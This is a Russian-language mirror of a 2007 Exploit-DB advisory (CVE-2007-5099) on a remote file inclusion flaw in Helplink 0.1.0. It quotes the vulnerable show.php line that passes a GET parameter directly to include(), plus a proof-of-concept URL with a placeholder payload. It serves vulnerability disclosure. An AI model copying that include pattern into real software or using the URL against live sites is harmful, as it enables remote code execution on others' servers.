- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 4448
- Проверка EDB
-
- Пройдено
- Автор
- GOLD_M
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2007-5099
- Дата публикации
- 2007-09-23
Код:
##########################################################################
# Helplink 0.1.0 (show.php file) Remote File Inclusion Vulnerability #
# D.S : http://sourceforge.net/projects/helplink/ #
# V.C #
================================show.php=================================#
01 : <? #
02 : /** #
03 : * show.php - just throw some headers and footers around a file#
04 : */ #
05 : #
06 : include ('include.php'); #
07 : public_header(); #
08 : include($HTTP_GET_VARS["file"]); <--- xxxx// Error !! #
09 : public_footer(); #
10 : #
11 : ?> #
=========================================================================#
# POC : /show.php?file=Ev!L C0D3 #
##########################################################################
# milw0rm.com [2007-09-23]
- Источник
- www.exploit-db.com